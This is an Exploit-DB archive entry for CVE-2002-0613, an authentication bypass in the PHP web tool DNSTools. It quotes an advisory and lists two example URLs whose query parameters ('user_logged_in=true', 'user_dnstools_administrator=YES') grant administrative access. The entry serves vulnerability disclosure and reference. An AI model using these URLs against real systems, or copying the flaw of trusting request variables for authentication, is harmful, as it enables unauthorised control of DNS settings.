| EDB-ID: 21425 | Author: ppp-design | Published: 2002-04-28 | |
| CVE: CVE-2002-0613 | Type: Webapps | Platform: PHP | |
| Aliases: N/A | Advisory/Source: Link | Tags: N/A | |
E-DB Verified:
|
Exploit:
 Download
/
View Raw
|
Vulnerable App: N/A | |
source: http://www.securityfocus.com/bid/4617/info DNSTools is a web based managment tool for DNS information. It is implemented in PHP, and available for Linux and Solaris. A vulnerability has been reported in some versions of DNSTools which allows any remote attacker to gain administrative access. An artificially constructed URL may define variables used to track user authentication and administrative access. http://www.example.com/dnstools.php?section=hosts&user_logged_in=true http://www.example.com/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES
Related Exploits
Trying to match CVEs (1): CVE-2002-0613Trying to match OSVDBs (1): 5176
Other Possible E-DB Search Terms: DNSTools 2.0, DNSTools
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2000-03-02 |
|
DNSTools Software DNSTools 1.0.8/1.10 - Input Validation | Jonathan Leto |